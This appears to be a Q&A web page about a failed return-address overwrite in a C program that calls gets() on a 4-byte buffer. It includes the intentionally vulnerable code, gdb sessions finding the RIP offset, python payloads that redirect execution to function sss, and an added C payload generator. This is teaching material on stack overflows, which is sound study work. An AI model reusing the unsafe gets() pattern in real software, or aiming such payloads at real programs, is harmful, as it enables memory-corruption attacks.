
ROP failed on Linux even when ASLR and the stack protector are disabled

I turned off ASLR and turned off the gcc stack protector.

I wrote vulnerable C code and tried to overflow the buffer, checking how many characters are needed for the crash. Then I tried to change the return address to another function, but I got a message:

Segmentation fault (core dumped)

This is my C code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* gets() was removed from the C11 <stdio.h>; declare it explicitly so the
 * program still compiles with a current gcc. The overflow below is intended. */
char *gets(char *s);

/* Target function: the goal is to redirect main's return address here. */
void sss()
{
  printf("good by");
}

void scriptpy(){
   printf("hello world\n");
}

int main(int argc , char** argv)
{
  char buf[4];
  gets(buf);   /* no bounds check: more than 3 input bytes overflow buf */
  return 0;
}

I found the address of the "sss" function and tried to insert the hex value.

This is my address:

(gdb) disas sss
 Dump of assembler code for function sss:
   0x00000000000006ca <+0>: push   %rbp

To edit the return address I insert:

printf "AAAABBBBB\xe2\x06\x00\x00\x00\x00\x00\x00" | ./cTutorial

Let's suppose that the binary is compiled with the flag -fno-stack-protector and that ASLR is disabled:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Find the crash:

The program starts crashing with a payload of 12 characters:

$ python3 -c "print('A' * 12)" | ./cTutorial
Segmentation fault (core dumped)

Controlling RIP

Using GDB to find the offset that overwrites RIP, we find that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:

$ gdb -q cTutorial
Reading symbols from cTutorial...
(No debugging symbols found in cTutorial)
(gdb) r <<<$(python3 -c "print('A' * 13)")
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6

Note that RIP is overwritten with 0041, where 00 is the null character terminating the string.

To control all bytes of RIP:

(gdb) r <<<$(python3 -c "print('A' * 18)")
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()

Let's suppose that the function sss is located at the address 0x0000555555555189.

The final payload is:

(gdb) b sss
(gdb) r <<<$(python3 -c "print('A' * 11 + '\x89\x51\x55\x55\x55\x55')")
breakpoint 1, 0x0000555555555189 in sss ()

Where 11 = 18 - (len('\x89\x51\x55\x55\x55\x55') + 1), the +1 being for the null byte.

The jump to the function sss is taken. The program will crash after the jump to sss, as the stack is corrupted.
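As an added example (not part of the question or the answer above), the following C program does the two steps from the answer without a text encoding in the way: it recovers the return-address offset from an all-'A' crash value and then emits the payload as raw bytes. Writing raw bytes matters because python3's print() encodes a character such as '\x89' as two UTF-8 bytes under a UTF-8 locale, so a str payload does not necessarily produce the bytes one counted. The address 0x0000555555555189 is the one the answer assumes for sss and the offset 12 (4 bytes of buf plus the 8-byte saved rbp, matching the 18-'A' crash at 0x0000414141414141) is taken from the gdb session; both are assumptions that must be re-measured for your own binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Distance from the start of buf[4] to the saved return address, as measured
 * in gdb above: 18 'A's leave six 0x41 bytes in RIP, so the return address
 * starts 18 - 6 = 12 bytes into the input. Assumed; re-measure per binary. */
#define RIP_OFFSET 12

/* Address the ret is redirected to. This is the value the answer assumes for
 * sss(); replace it with what "p sss" or "disas sss" prints for your binary. */
#define SSS_ADDR 0x0000555555555189ULL

/* Recover the RIP offset from a crash caused by an all-'A' payload: count how
 * many low-order bytes of the faulting RIP are 0x41 and subtract that count
 * from the payload length. */
size_t offset_from_crash(size_t payload_len, uint64_t crashed_rip)
{
    size_t n = 0;
    while (n < 8 && ((crashed_rip >> (8 * n)) & 0xff) == 0x41)
        n++;
    return payload_len - n;
}

/* Build the payload in out: `offset` filler bytes followed by the target
 * address as 8 little-endian bytes (x86-64 byte order). Returns the payload
 * length, or 0 if out is too small. Embedded zero bytes are acceptable here
 * because gets() stops only at '\n' or EOF, not at NUL. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset, uint64_t target)
{
    if (cap < offset + 8)
        return 0;
    memset(out, 'A', offset);
    for (int i = 0; i < 8; i++)
        out[offset + i] = (unsigned char)(target >> (8 * i));
    return offset + 8;
}

int main(int argc, char **argv)
{
    /* Optional argument: target address in hex, e.g. 555555555189 */
    uint64_t target = argc > 1 ? strtoull(argv[1], NULL, 16) : SSS_ADDR;
    unsigned char payload[64];
    size_t n = build_payload(payload, sizeof payload, RIP_OFFSET, target);
    if (n == 0)
        return 1;
    /* Raw bytes straight to stdout; no locale or encoding can alter them. */
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

Build it with gcc and feed the output to the target, for example ./mkpayload > payload.bin and then, inside gdb, r < payload.bin after b sss. Two things to expect when running outside gdb: the "good by" text from sss may never appear, because stdout is fully buffered when it is a pipe and the process dies before flushing; and the crash inside sss is often not the corrupted stack itself but a 16-byte stack alignment fault in printf, since a ret-based redirect enters sss with rsp misaligned by 8 relative to a normal call.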

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM